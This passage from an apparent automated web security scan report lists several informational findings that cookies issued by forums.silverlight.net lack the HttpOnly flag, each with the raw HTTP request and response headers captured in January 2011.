User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 72987
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:32 GMT; expires=Sun, 29-Jan-2012 23:17:32 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:33 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:34 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Progra
...[SNIP]...

17.168. http://forums.silverlight.net/forums/17.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/17.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:32 GMT; expires=Sun, 29-Jan-2012 23:17:32 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:33 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/17.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 76509
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:32 GMT; expires=Sun, 29-Jan-2012 23:17:32 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:33 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Progra
...[SNIP]...

17.169. http://forums.silverlight.net/forums/18.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/18.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:34 GMT; expires=Sun, 29-Jan-2012 23:17:34 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:35 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/18.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 73765
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:34 GMT; expires=Sun, 29-Jan-2012 23:17:34 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:35 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:36 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Visual
...[SNIP]...

17.170. http://forums.silverlight.net/forums/19.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/19.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:15 GMT; expires=Sun, 29-Jan-2012 23:18:15 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:15 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/19.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 73133
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:15 GMT; expires=Sun, 29-Jan-2012 23:18:15 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:15 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Design
...[SNIP]...

17.171. http://forums.silverlight.net/forums/20.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/20.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:22 GMT; expires=Sun, 29-Jan-2012 23:18:22 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:23 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/20.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 71471
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:22 GMT; expires=Sun, 29-Jan-2012 23:18:22 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:23 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:23 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Video
...[SNIP]...

17.172. http://forums.silverlight.net/forums/21.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/21.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:47 GMT; expires=Sun, 29-Jan-2012 23:18:47 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:52 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/21.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 64982
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:47 GMT; expires=Sun, 29-Jan-2012 23:18:47 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:52 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Expres
...[SNIP]...

17.173. http://forums.silverlight.net/forums/25.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/25.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:48 GMT; expires=Sun, 29-Jan-2012 23:18:48 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:48 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/25.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 66083
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:48 GMT; expires=Sun, 29-Jan-2012 23:18:48 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:48 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Feedba
...[SNIP]...

17.174. http://forums.silverlight.net/forums/28.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/28.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:40 GMT; expires=Sun, 29-Jan-2012 23:17:40 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:40 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/28.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 76750
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:40 GMT; expires=Sun, 29-Jan-2012 23:17:40 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:40 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Report
...[SNIP]...

17.175. http://forums.silverlight.net/forums/35.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/35.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:33 GMT; expires=Sun, 29-Jan-2012 23:17:33 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:34 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/35.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 76441
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:33 GMT; expires=Sun, 29-Jan-2012 23:17:33 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:34 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:34 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Silver
...[SNIP]...

17.176. http://forums.silverlight.net/forums/46.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/46.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:51 GMT; expires=Sun, 29-Jan-2012 23:17:51 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:51 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/46.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 72228
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:51 GMT; expires=Sun, 29-Jan-2012 23:17:51 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:51 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Access
...[SNIP]...

17.177. http://forums.silverlight.net/forums/51.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/51.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:23 GMT; expires=Sun, 29-Jan-2012 23:17:23 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:25 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/51.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 68826
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:23 GMT; expires=Sun, 29-Jan-2012 23:17:23 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:25 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:25 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
New Fe
...[SNIP]...

17.178. http://forums.silverlight.net/forums/52.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/52.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:00 GMT; expires=Sun, 29-Jan-2012 23:18:00 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:02 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/52.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 68254
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:00 GMT; expires=Sun, 29-Jan-2012 23:18:00 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:02 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:02 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Game D
...[SNIP]...

17.179. http://forums.silverlight.net/forums/53.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/53.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:54 GMT; expires=Sun, 29-Jan-2012 23:17:54 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:54 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 73495
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:54 GMT; expires=Sun, 29-Jan-2012 23:17:54 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:54 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:54 GMT
Connection: close

